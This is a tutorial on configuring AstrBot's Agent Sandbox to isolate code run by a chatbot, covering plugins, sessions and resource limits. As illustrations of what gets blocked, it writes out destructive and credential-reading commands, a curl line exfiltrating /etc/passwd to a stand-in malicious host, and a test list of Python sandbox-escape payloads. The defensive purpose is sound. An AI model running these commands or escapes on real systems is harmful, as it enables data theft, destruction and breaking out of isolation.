
How to Use AstrBot's Agent Sandbox for Safe Code Execution

Problem

When I built an AI chatbot that could execute Python code, I quickly ran into a scary realization: what if a user asks the bot to run os.system('rm -rf /') or to read sensitive files like /etc/passwd?

I tried using Python’s built-in exec() function:

naive_executor.py
def run_user_code(code: str):
    try:
        exec(code)
    except Exception as e:
        print(f"Error: {e}")

# A user sends this through my chatbot
run_user_code("import os; os.system('cat /etc/passwd')")

This is obviously dangerous. The code runs inside the bot's own process, with the same privileges the bot has on my server.

Why Sandboxing Matters

The core problem with unrestricted code execution is attack surface. A malicious user could:

  • Read sensitive files (credentials, config files)
  • Delete critical data
  • Make unauthorized network requests
  • Consume all system resources (fork bombs, memory exhaustion)
  • Pivot to other parts of the infrastructure

Traditional solutions like RestrictedPython only provide partial protection. They can restrict some builtins and attributes, but determined attackers can often bypass these restrictions through various Python internals.
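To make the bypass idea concrete, here is a minimal sketch of the general problem with in-interpreter restrictions. It uses plain exec with an emptied builtins table, not RestrictedPython, which applies additional compile-time checks. The helper name run_without_builtins is mine, for illustration only.

```python
def run_without_builtins(code: str) -> dict:
    """Run code with an empty __builtins__ table, a common naive 'restriction'."""
    scope = {"__builtins__": {}}
    exec(code, scope)
    return scope


# No import and no builtin function is needed here: start from a tuple
# literal, climb to `object`, then list every class loaded in the interpreter.
payload = "classes = ().__class__.__base__.__subclasses__()"
scope = run_without_builtins(payload)
reachable = {cls.__name__ for cls in scope["classes"]}
print(len(reachable), "classes reachable without any builtins")
```

From that class list an attacker can look for anything that wraps file or process access, which is why name-based filtering inside the same interpreter is hard to get right.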

What I needed was true isolation - a separate environment where code runs with limited capabilities, and failures don’t affect the host system.
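As a first step toward that idea, the sketch below runs code in a child interpreter instead of the bot's own process. This is an illustration using only the standard library, not AstrBot's implementation, and run_isolated is a hypothetical helper. A separate process alone does not restrict filesystem or network access; it only keeps crashes and hangs out of the host process.

```python
import subprocess
import sys


def run_isolated(code: str, timeout_s: float = 5.0) -> dict:
    """Run code in a child interpreter and report output or error."""
    try:
        proc = subprocess.run(
            # -I: isolated mode (ignores PYTHON* env vars and the user site dir)
            [sys.executable, "-I", "-c", code],
            capture_output=True,
            text=True,
            timeout=timeout_s,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before raising TimeoutExpired
        return {"output": "", "error": f"Timed out after {timeout_s}s"}
    if proc.returncode != 0:
        error = proc.stderr.strip() or f"Exit code {proc.returncode}"
        return {"output": proc.stdout, "error": error}
    return {"output": proc.stdout, "error": None}


print(run_isolated("print(2 + 2)"))
print(run_isolated("while True: pass", timeout_s=1)["error"])
```

An infinite loop or an unhandled exception in the child now comes back as an error string instead of taking down the chatbot.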

What is AstrBot’s Agent Sandbox?

AstrBot is an open-source chatbot framework that includes a built-in Agent Sandbox feature. The sandbox provides isolated Python and shell execution environments for AI agents.

The architecture looks like this:

Sandbox Architecture
┌─────────────────────────────────────────────────────────────┐
│                      User/LLM Request                       │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                    Security Policy Check                    │
│   ┌─────────────────────────────────────────────────────┐   │
│   │ - Module whitelist/blacklist                        │   │
│   │ - Command validation                                │   │
│   │ - Resource limit enforcement                        │   │
│   └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                      Isolated Runtime                       │
│   ┌─────────────────────────────────────────────────────┐   │
│   │ - Separate process/container                        │   │
│   │ - Limited filesystem access                         │   │
│   │ - Network restrictions                              │   │
│   │ - Memory/CPU/time limits                            │   │
│   └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                        Output Filter                        │
│   ┌─────────────────────────────────────────────────────┐   │
│   │ - Sanitize results                                  │   │
│   │ - Redact sensitive information                      │   │
│   └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                         Safe Result                         │
└─────────────────────────────────────────────────────────────┘
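The last stage of the diagram, the output filter, can be pictured with a small sketch. The redaction pattern and the sanitize_output helper below are my own assumptions for illustration; the article does not say which rules AstrBot actually applies.

```python
import re

# Hypothetical rule: "key = value" pairs whose key looks like a credential.
_SECRET = re.compile(r"(?i)\b(api[_-]?key|password|secret|token)(\s*[=:]\s*)\S+")


def sanitize_output(text: str, max_chars: int = 2000) -> str:
    """Redact credential-looking values, then cap the output length."""
    redacted = _SECRET.sub(r"\1\2[REDACTED]", text)
    if len(redacted) > max_chars:
        redacted = redacted[:max_chars] + "... [truncated]"
    return redacted


print(sanitize_output("password=hunter2 ok"))
```

Pattern-based redaction only catches what the patterns anticipate, so it works best as a final safety net behind the isolation layers above it.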

Key capabilities:

  • Python execution: Run Python code with restricted module access
  • Shell execution: Execute shell commands with filtering
  • Session management: Maintain state across multiple code executions
  • Resource limits: Control memory, CPU, and execution time
  • Web ChatUI integration: Access sandbox through AstrBot’s web interface

Setting Up the Sandbox

Prerequisites

  • AstrBot installed (version 3.4.0 or later)
  • Python 3.8+
  • Docker (recommended for full isolation)

Installation

First, I cloned and installed AstrBot:

terminal
git clone https://github.com/Soulter/AstrBot.git
cd AstrBot
pip install -r requirements.txt

Enabling the Agent Sandbox

In the AstrBot configuration, I enabled the sandbox feature:

config.yaml
agent_sandbox:
  enabled: true
  backend: "docker"  # or "local" for process isolation
  security_policy:
    restricted_modules:
      - os
      - subprocess
      - socket
      - ctypes
      - sys
    memory_limit: "256m"
    cpu_limit: 1
    execution_timeout: 30
    network_access: "restricted"
    allowed_commands:
      - ls
      - cat
      - grep
      - python

The backend option determines the isolation level:

  • docker: Full container isolation (recommended)
  • local: Process-based isolation (lighter but less secure)
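To give a feel for what container isolation involves, the sketch below maps the limits from the config onto standard docker run flags. This is my own illustration, not AstrBot's code: the build_docker_command helper, the image name, and the --pids-limit value are assumptions. The function only builds the argument list and does not start a container.

```python
from typing import List


def build_docker_command(
    code: str,
    memory_limit: str = "256m",
    cpu_limit: float = 1,
    image: str = "python:3.11-slim",  # assumed image, pick your own
) -> List[str]:
    """Build a `docker run` argument list for a throwaway, locked-down container."""
    return [
        "docker", "run", "--rm",       # remove the container when it exits
        "--network", "none",           # no network inside the container
        "--memory", memory_limit,      # hard memory cap
        "--cpus", str(cpu_limit),      # CPU quota
        "--pids-limit", "64",          # blunt fork bombs (assumed value)
        "--read-only",                 # read-only root filesystem
        image, "python", "-I", "-c", code,
    ]


print(" ".join(build_docker_command("print(1)")[:-1]))
```

The list could be passed to subprocess.run together with a timeout; enforcing execution_timeout on the container itself would need extra handling that this sketch leaves out.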

Executing Python Code Safely

Basic Code Execution

I created a simple plugin to execute user-provided Python code:

plugins/sandbox_executor/main.py
from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register


@register("sandbox_executor", "author", "Safe code execution plugin", "1.0.0", "https://github.com/example")
class SandboxExecutorPlugin(Star):
    @filter.command("run")
    async def execute_code(self, event: AstrMessageEvent):
        # Extract code from message: /run print('hello')
        # count=1 strips only the leading command, not "/run " inside the code
        code = event.get_plain_text().replace("/run ", "", 1)
        # Execute in sandbox
        result = await self.context.agent_sandbox.execute_python(code)
        if result.get("error"):
            yield event.plain_result(f"Error: {result['error']}")
        elif result.get("security_violations"):
            yield event.plain_result("Blocked: Security violation detected")
        else:
            yield event.plain_result(f"Output: {result['output']}")

When I tested with safe code:

chat
User: /run print(2 + 2)
Bot: Output: 4
User: /run [x**2 for x in range(10)]
Bot: Output: [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

Handling Security Violations

When I tried to import restricted modules:

chat
User: /run import os; os.system('whoami')
Bot: Blocked: Security violation detected

The sandbox detected the attempt to import os and blocked execution.
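I have not looked at how AstrBot detects the import internally. One common approach, sketched below as an assumption, is to parse the code and scan the syntax tree for import statements before anything runs. The find_restricted_imports helper is hypothetical.

```python
import ast
from typing import Iterable, List


def find_restricted_imports(code: str, restricted: Iterable[str]) -> List[str]:
    """Return restricted top-level modules that the code imports directly."""
    blocked = set(restricted)
    hits: List[str] = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            root = name.split(".")[0]  # "os.path" counts as "os"
            if root in blocked and root not in hits:
                hits.append(root)
    return hits


print(find_restricted_imports("import os; os.system('whoami')", ["os", "subprocess"]))
```

A scan like this only sees literal import statements, so it complements the runtime isolation rather than replacing it.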

I also tested what happens with resource exhaustion attempts:

test_code.py
# This tries to consume all memory
x = []
while True:
    x.append(' ' * 1000000)

The sandbox killed the process after hitting the memory limit:

chat
User: /run x = []\nwhile True:\n x.append(' ' * 1000000)
Bot: Error: Memory limit exceeded (256MB)
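For the process-based backend, a limit like this can be approximated on POSIX systems with the standard resource module. The sketch below is my own illustration of the idea, not AstrBot's implementation; run_with_memory_limit is a hypothetical helper and it does not work on Windows.

```python
import resource  # POSIX only
import subprocess
import sys


def run_with_memory_limit(code: str, limit_mb: int = 256, timeout_s: float = 30.0):
    """Run code in a child interpreter whose address space is capped."""
    limit_bytes = limit_mb * 1024 * 1024

    def apply_limit():
        # Runs in the child just before the interpreter starts.
        _, hard = resource.getrlimit(resource.RLIMIT_AS)
        if hard != resource.RLIM_INFINITY:
            new_limit = min(limit_bytes, hard)  # never try to exceed the hard limit
        else:
            new_limit = limit_bytes
        # Lower soft and hard limits so the child cannot raise them again.
        resource.setrlimit(resource.RLIMIT_AS, (new_limit, new_limit))

    return subprocess.run(
        [sys.executable, "-I", "-c", code],
        capture_output=True,
        text=True,
        timeout=timeout_s,
        preexec_fn=apply_limit,
    )


hog = run_with_memory_limit("x = bytearray(1024**3)", limit_mb=512)
print(hog.returncode, hog.stderr.strip().splitlines()[-1])
```

With the cap in place, an oversized allocation fails inside the child with MemoryError instead of exhausting the host. A container backend would typically rely on cgroup limits instead.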

Safe Shell Command Execution

The sandbox also supports shell command execution with filtering:

plugins/shell_executor/main.py
from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register


@register("shell_executor", "author", "Shell command plugin", "1.0.0", "https://github.com/example")
class ShellExecutorPlugin(Star):
    @filter.command("shell")
    async def execute_shell(self, event: AstrMessageEvent):
        # count=1 strips only the leading command prefix
        command = event.get_plain_text().replace("/shell ", "", 1)
        # Execute shell command in sandbox
        result = await self.context.agent_sandbox.execute_shell(command)
        if result.get("blocked"):
            yield event.plain_result(f"Blocked: {result['reason']}")
        elif result.get("error"):
            yield event.plain_result(f"Error: {result['error']}")
        else:
            yield event.plain_result(f"Output:\n{result['output']}")

Testing with allowed commands:

chat
User: /shell ls -la
Bot: Output:
total 8
drwxr-xr-x 2 root root 4096 Mar 3 10:00 .
drwxr-xr-x 3 root root 4096 Mar 3 10:00 ..

But dangerous commands get blocked:

chat
User: /shell rm -rf /
Bot: Blocked: Command 'rm' not in allowed list
User: /shell curl http://malicious-site.com/exfil?data=$(cat /etc/passwd)
Bot: Blocked: Command 'curl' not in allowed list
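The filtering itself can be pictured as an allowlist check on the program name plus a rejection of shell metacharacters. The sketch below is an assumption about how such a filter might work, not AstrBot's code; check_command and the metacharacter set are hypothetical.

```python
import shlex
from typing import Iterable, Tuple

# Characters that let one command line chain, pipe, substitute, or redirect.
SHELL_METACHARACTERS = set(";|&$`<>\n")


def check_command(command: str, allowed: Iterable[str]) -> Tuple[bool, str]:
    """Return (is_allowed, reason) for a single command line."""
    try:
        tokens = shlex.split(command)
    except ValueError as exc:  # e.g. unbalanced quotes
        return False, f"Could not parse command: {exc}"
    if not tokens:
        return False, "Empty command"
    if tokens[0] not in set(allowed):
        return False, f"Command '{tokens[0]}' not in allowed list"
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False, "Shell metacharacters are not allowed"
    return True, "ok"


ALLOWED = ["ls", "cat", "grep", "python"]
for cmd in ["ls -la", "rm -rf /", "ls && rm -rf /", "cat /etc/passwd"]:
    print(cmd, "->", check_command(cmd, ALLOWED))
```

Note that cat /etc/passwd passes this check because cat is on the list. The allowlist decides which programs may run, while the restricted filesystem of the isolated runtime decides what they can actually see.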

Session-Level Resource Management

One powerful feature is session-based execution. This allows maintaining state across multiple code runs within a session.

Why Sessions Matter

Without sessions, each code execution starts fresh. But sometimes I need to:

  • Load a large dataset once, then query it multiple times
  • Train a model incrementally
  • Maintain variables across conversation turns

Using Sessions

plugins/session_executor/main.py
from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register


@register("session_executor", "author", "Session-based execution", "1.0.0", "https://github.com/example")
class SessionExecutorPlugin(Star):
    def __init__(self, context: Context):
        super().__init__(context)
        self.sessions = {}  # user_id -> session_id

    @filter.command("session_start")
    async def start_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        # Create a new sandbox session
        session_id = await self.context.agent_sandbox.create_session(
            user_id=user_id,
            timeout=300,  # 5 minute session
            memory_limit="512m"
        )
        self.sessions[user_id] = session_id
        yield event.plain_result(f"Session started: {session_id[:8]}...")

    @filter.command("srun")
    async def execute_in_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        session_id = self.sessions.get(user_id)
        if not session_id:
            yield event.plain_result("No active session. Use /session_start first.")
            return
        # count=1 strips only the leading command prefix
        code = event.get_plain_text().replace("/srun ", "", 1)
        # Execute in existing session (state persists)
        result = await self.context.agent_sandbox.execute_python(
            code,
            session_id=session_id
        )
        yield event.plain_result(f"Output: {result.get('output', result.get('error'))}")

    @filter.command("session_end")
    async def end_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        session_id = self.sessions.pop(user_id, None)
        if session_id:
            await self.context.agent_sandbox.destroy_session(session_id)
            yield event.plain_result("Session ended and resources cleaned up.")
        else:
            yield event.plain_result("No active session to end.")

A practical example - loading and analyzing data:

chat
User: /session_start
Bot: Session started: a1b2c3d4...
User: /srun import pandas as pd
Bot: Output: None
User: /srun df = pd.read_csv('data.csv') # Pre-uploaded file
Bot: Output: None
User: /srun df.head()
Bot: Output:
id name value
0 1 Alice 100
1 2 Bob 200
2 3 Charlie 150
User: /srun df['value'].mean()
Bot: Output: 150.0
User: /session_end
Bot: Session ended and resources cleaned up.

The session kept df in memory across multiple executions.
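Conceptually, a session is a namespace that outlives a single execution. The sketch below shows that idea in-process with exec, purely to illustrate state persistence; it provides no isolation and is not how AstrBot implements sessions. The InProcessSession class is hypothetical.

```python
import ast


class InProcessSession:
    """Keeps one namespace alive across several run() calls."""

    def __init__(self):
        self.namespace = {}

    def run(self, code: str):
        tree = ast.parse(code)
        last_expr = None
        # If the snippet ends with an expression, evaluate it separately so
        # its value can be returned (statements such as imports return None).
        if tree.body and isinstance(tree.body[-1], ast.Expr):
            last_expr = ast.Expression(tree.body.pop().value)
        exec(compile(tree, "<session>", "exec"), self.namespace)
        if last_expr is not None:
            return eval(compile(last_expr, "<session>", "eval"), self.namespace)
        return None


session = InProcessSession()
print(session.run("x = 21"))
print(session.run("x * 2"))
```

This also mirrors the chat above: statements like import pandas as pd produce no value, while a trailing expression such as df.head() does.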

Session Lifecycle

The session lifecycle follows this pattern:

Session Flow
┌────────────────┐
│ Create Session │ ──→ Allocate resources, assign session_id
└───────┬────────┘
        │
        ▼
┌────────────────┐
│  Execute Code  │ ──→ Run in session context (state persists)
└───────┬────────┘
        │
        ▼
┌────────────────┐
│  Execute More  │ ──→ Previous variables/functions available
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Destroy Session│ ──→ Clean up memory, release resources
└────────────────┘

Sessions automatically expire after the configured timeout, preventing resource leaks from abandoned sessions.
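Expiry of this kind usually comes down to tracking a timestamp per session and sweeping stale entries. The sketch below assumes an idle timeout (the clock restarts on each use), which is my reading rather than something the article confirms. SessionRegistry is a hypothetical class.

```python
import time
import uuid
from typing import Callable, Dict, List


class SessionRegistry:
    """Tracks last activity per session and drops idle ones."""

    def __init__(self, timeout_s: float = 300.0,
                 clock: Callable[[], float] = time.monotonic):
        self._timeout_s = timeout_s
        self._clock = clock  # injectable so expiry can be tested without waiting
        self._last_used: Dict[str, float] = {}

    def create(self) -> str:
        session_id = uuid.uuid4().hex
        self._last_used[session_id] = self._clock()
        return session_id

    def touch(self, session_id: str) -> bool:
        """Record activity; returns False if the session is unknown or expired."""
        self.purge_expired()
        if session_id not in self._last_used:
            return False
        self._last_used[session_id] = self._clock()
        return True

    def purge_expired(self) -> List[str]:
        now = self._clock()
        expired = [sid for sid, used in self._last_used.items()
                   if now - used >= self._timeout_s]
        for sid in expired:
            del self._last_used[sid]  # a real sandbox would free the runtime here
        return expired


registry = SessionRegistry(timeout_s=300)
sid = registry.create()
print(registry.touch(sid))
```

Calling purge_expired from a periodic background task would cover users who simply walk away without sending /session_end.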

Using the Sandbox via Web ChatUI

AstrBot includes a web interface that integrates with the sandbox. After starting AstrBot with the web plugin:

terminal
python main.py --web

The web interface is available at http://localhost:6185.

In the ChatUI, I can enable agent mode, which allows the AI to execute code through the sandbox. When the AI needs to run calculations or process data, it automatically uses the sandbox.

The ChatUI shows:

  • Code being executed
  • Output or errors
  • Execution time
  • Resource usage

This is useful for:

  • Quick data analysis tasks
  • Mathematical computations
  • File processing workflows

Advanced Security Configuration

Custom Module Restrictions

I can fine-tune which modules are allowed:

config.yaml
agent_sandbox:
  security_policy:
    # Completely block these modules
    restricted_modules:
      - os
      - subprocess
      - socket
      - ctypes
      - sys
      - importlib
      - builtins
    # Allow specific functions from otherwise restricted modules
    module_overrides:
      os.path:
        allowed: true
        functions:
          - join
          - basename
          - dirname
          - exists
    # Whitelist approach (more secure but restrictive)
    mode: "whitelist"
    allowed_modules:
      - math
      - json
      - re
      - datetime
      - collections
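To show what whitelist mode means at runtime, here is a minimal sketch that swaps in a guarded __import__ for the executed code. It is an illustration of the concept under my own assumptions, not AstrBot's mechanism, and both helper names are hypothetical. On its own it is bypassable through introspection, so treat it as one layer only.

```python
import builtins


def make_guarded_import(allowed_modules):
    """Build an __import__ replacement that only admits whitelisted modules."""
    allowed = set(allowed_modules)
    real_import = builtins.__import__

    def guarded_import(name, globals=None, locals=None, fromlist=(), level=0):
        root = name.split(".")[0]
        if root not in allowed:
            raise ImportError(f"Module '{root}' is not in the allowed list")
        return real_import(name, globals, locals, fromlist, level)

    return guarded_import


def run_with_whitelist(code: str, allowed_modules) -> dict:
    """Execute code whose import statements go through the guarded import."""
    safe_builtins = dict(vars(builtins))
    safe_builtins["__import__"] = make_guarded_import(allowed_modules)
    scope = {"__builtins__": safe_builtins}
    exec(code, scope)
    return scope


scope = run_with_whitelist("import math\nresult = math.sqrt(16)", ["math", "json"])
print(scope["result"])
```

Imports made internally by an allowed module still use the real import machinery, so whitelisting json does not require whitelisting everything json depends on.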

Network Access Control

For use cases requiring network access (like web search):

config.yaml
agent_sandbox:
  security_policy:
    network_access: "restricted"
    allowed_domains:
      - "api.openai.com"
      - "search.example.com"
    # Block all other network requests
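A domain allowlist boils down to comparing the parsed hostname of each outgoing request against the configured list. The sketch below assumes exact hostname matching; whether AstrBot also admits subdomains is not something I verified. is_allowed_url is a hypothetical helper.

```python
from urllib.parse import urlparse


def is_allowed_url(url: str, allowed_domains) -> bool:
    """Allow a URL only if its hostname exactly matches an allowed domain."""
    host = urlparse(url).hostname  # lowercased; None when the URL has no host
    return host is not None and host in {d.lower() for d in allowed_domains}


ALLOWED_DOMAINS = ["api.openai.com", "search.example.com"]
print(is_allowed_url("https://api.openai.com/v1/chat", ALLOWED_DOMAINS))
print(is_allowed_url("https://api.openai.com.evil.example/", ALLOWED_DOMAINS))
```

Matching on the parsed hostname rather than on a substring of the URL avoids lookalike hosts such as api.openai.com.evil.example slipping through.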

Resource Limits

Adjust limits based on expected workload:

config.yaml
agent_sandbox:
  security_policy:
    memory_limit: "512m"      # Per execution
    cpu_limit: 2              # Number of CPU cores
    execution_timeout: 60     # Seconds
    max_output_size: "10m"    # Limit output size
    max_file_size: "100m"     # Limit file operations
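Size strings like "512m" have to be turned into byte counts somewhere. The sketch below assumes binary units (1m = 1024 * 1024 bytes), which is the convention Docker uses for memory limits. parse_size and clip_output are hypothetical helpers showing how max_output_size might be applied.

```python
_UNITS = {"b": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}


def parse_size(value: str) -> int:
    """Convert strings such as '512m' or '10k' to a number of bytes."""
    text = value.strip().lower()
    if text and text[-1] in _UNITS:
        return int(text[:-1]) * _UNITS[text[-1]]
    return int(text)  # no suffix: plain byte count


def clip_output(output: str, max_output_size: str = "10m") -> str:
    """Trim output so its UTF-8 encoding fits within the configured size."""
    limit = parse_size(max_output_size)
    data = output.encode("utf-8")
    if len(data) <= limit:
        return output
    # errors="ignore" drops a multi-byte character cut in half at the boundary
    return data[:limit].decode("utf-8", errors="ignore")


print(parse_size("512m"))
```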

Best Practices

What I Learned the Hard Way

  1. Start restrictive, then relax: Begin with a whitelist approach and add permissions as needed, rather than starting permissive and trying to tighten later.

  2. Test with real attack patterns: I created a test suite with common attack vectors:

    tests/test_sandbox_security.py
    ATTACK_VECTORS = [
        "import os; os.system('id')",
        "__import__('subprocess').call(['cat', '/etc/passwd'])",
        "exec(open('/etc/passwd').read())",
        "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
    ]

  3. Monitor resource usage: Even with limits, track CPU/memory trends to catch slow resource leaks.

  4. Log everything: Security events, violations, and execution patterns help identify attack attempts.

  5. Session cleanup is critical: Always implement session cleanup, especially for web applications where users might not explicitly end sessions.

Common Mistakes

  1. Relying only on module restrictions: Advanced attackers can use Python’s introspection to access blocked functionality. Always use container/process isolation as the primary defense.

  2. Ignoring timeout configuration: A complex computation might hang indefinitely without proper timeout settings.

  3. Allowing too many shell commands: Each allowed command is potential attack surface. The allowed_commands list should be minimal.

  4. Not handling errors gracefully: Exposing internal error messages can leak system information. Sanitize error output.
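The first mistake is easy to demonstrate. The sketch below runs the four attack vectors from my test suite through a deliberately naive static check that only looks for import statements. The checker is my own illustration, not AstrBot's policy engine.

```python
import ast

ATTACK_VECTORS = [
    "import os; os.system('id')",
    "__import__('subprocess').call(['cat', '/etc/passwd'])",
    "exec(open('/etc/passwd').read())",
    "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
]
RESTRICTED = {"os", "subprocess", "socket", "ctypes", "sys"}


def naive_import_scan(code: str) -> bool:
    """Return True if the code contains a plain import of a restricted module."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            if any(alias.name.split(".")[0] in RESTRICTED for alias in node.names):
                return True
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RESTRICTED:
                return True
    return False


caught = [naive_import_scan(vector) for vector in ATTACK_VECTORS]
for vector, hit in zip(ATTACK_VECTORS, caught):
    print("caught" if hit else "MISSED", "|", vector[:50])
```

Only the first vector contains an import statement, so the other three pass the scan untouched. That gap is the reason container or process isolation has to be the primary defense.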

The Reason

The key insight is that secure code execution requires multiple layers of defense:

  1. Container/process isolation prevents direct system access
  2. Module restrictions limit what the code can import
  3. Resource limits prevent denial-of-service attacks
  4. Command filtering controls shell execution
  5. Session management prevents resource leaks

No single layer is sufficient, but together they provide strong protection.

Summary

In this post, I showed how to use AstrBot’s Agent Sandbox for secure code execution. I covered setting up the sandbox, executing Python and shell commands safely, managing sessions for stateful execution, and configuring security policies.

The key point is that sandboxing AI-generated code requires defense in depth - isolation, restrictions, limits, and monitoring all working together. AstrBot’s built-in sandbox provides these layers out of the box, making it easier to build secure AI agents.

Final Words + More Resources

My intention with this article was to share my knowledge and experience with others. If you want to get in touch, you can contact me by email.

Here are also the most important links from this article along with some further resources that will help you in this scope:

Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!
